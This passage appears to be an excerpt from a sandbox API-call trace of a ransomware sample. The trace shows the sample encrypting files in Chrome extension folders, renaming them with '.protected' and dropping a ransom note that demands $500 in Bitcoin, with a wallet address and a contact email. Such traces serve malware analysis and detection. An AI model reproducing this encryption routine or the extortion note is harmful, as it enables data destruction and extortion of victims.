dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.363] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x107, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x107, lpOverlapped=0x0) returned 1 
[0079.363] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.363] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.363] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.363] CloseHandle (hObject=0x168) returned 1 [0079.363] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.protected") returned 166 [0079.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.protected")) returned 1 [0079.364] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.364] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.364] wnsprintfW (in: 
pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\RESTORE_FILES.txt") returned 160 [0079.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.365] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.365] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.365] lstrlenA (lpString="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") returned 684 [0079.365] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.366] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.366] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.366] CloseHandle (hObject=0x164) returned 1 [0079.366] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.366] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0079.366] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0079.366] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0079.366] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0079.366] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0079.366] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu") returned 142 [0079.366] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0079.366] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0079.366] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\*") returned 144 [0079.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.366] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.366] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.366] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.366] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.366] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.366] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\.") returned 144 [0079.366] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.366] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.367] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.367] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.367] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.367] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.367] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.367] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\..") returned 145 [0079.367] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.367] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.367] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.367] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.367] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.367] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.367] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.367] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.367] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json") returned 156 [0079.367] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.367] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.367] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.367] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json") returned 156 [0079.367] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json") returned 156 [0079.367] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json") returned 156 [0079.368] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.368] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0079.369] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.369] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0079.369] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.369] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.369] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.369] CloseHandle (hObject=0x168) returned 1 [0079.369] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.protected") returned 166 [0079.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.protected")) returned 1 [0079.370] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.370] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.370] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\RESTORE_FILES.txt") returned 160 [0079.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.370] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.370] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.371] lstrlenA (lpString="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") returned 684 [0079.371] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0079.371] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.371] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.371] CloseHandle (hObject=0x164) returned 1 [0079.371] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.371] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0079.372] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0079.372] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0079.372] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0079.372] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0079.372] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id") returned 142 [0079.372] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0079.372] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0079.372] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\*") returned 144 [0079.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.372] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0079.372] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.372] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.372] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.372] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.372] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\.") returned 144 [0079.372] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.372] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.372] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.372] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.372] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.372] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.372] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.372] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\..") returned 145 [0079.372] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.372] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.372] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.372] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.372] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.372] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0079.372] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.372] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.373] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json") returned 156 [0079.373] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.373] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.373] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.373] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json") returned 156 [0079.374] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json") returned 156 [0079.374] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json") returned 156 [0079.374] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.374] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x105, lpOverlapped=0x0) returned 1 [0079.375] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.375] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x105, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x105, lpOverlapped=0x0) returned 1 [0079.375] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.375] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.375] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.375] CloseHandle (hObject=0x168) returned 1 [0079.375] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.protected") returned 166 [0079.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.protected")) returned 1 [0079.376] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.376] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\RESTORE_FILES.txt") returned 160 [0079.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: 